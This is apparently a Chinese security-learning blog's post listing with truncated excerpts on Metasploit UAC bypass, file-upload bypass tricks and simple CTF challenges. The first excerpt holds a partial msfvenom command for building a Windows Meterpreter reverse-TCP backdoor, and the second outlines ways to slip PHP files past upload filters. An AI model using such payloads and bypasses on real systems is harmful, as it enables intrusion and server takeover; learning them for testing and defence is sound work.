- 博客(3)
- 收藏
- 关注
RSS订阅原创 matesploit提权绕过UAC
在学习matesploit的过程,遇到很多问题,一些问题花了好长时间,看了许多的大佬的文章才得到解决,唯恐以后自己忘记,同时希望有遇到同样问题的朋友碰巧看到而得到解决。(大佬搬运工)1 启动postgresql数据库,然后启动msf2 制作windows后门payload,msfvenom -p windows/meterpreter/reverse_tcp lhost=本机ip lport...
2018-10-17 16:49:58
698
原创 几种简单的文件上传漏洞类型
1. 绕过前端js:要求上传图片类型的文件,我们可以把php文件改成jpg的文件类型,通过burpsuite抓包把"c.jpg"修改为"c.php",这样便可以成功上传文件。2. 文件类型绕过:上传"c.php"时,通过burpsuite抓包:把"Content-Type:"修改为“image/jpeg”的图片类型,成功上传3. php文件后缀名绕过:php...
2018-08-19 19:38:19
10372
4
原创 简单查找漏洞
1.http://120.24.86.145:8002/yanzhengma/ 随机数生成查找flag:输入框内只允许输入1位数字,查看源代码,发现:,则在浏览器F12打开开发者模式,在查看器中修改“maxlength"的值,改为3,回车后输入验证码答案,flag就出现了 2.http://120.24.86.145:9001/test/ 点击一百万次查找f...
2018-07-27 16:18:01
5276
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人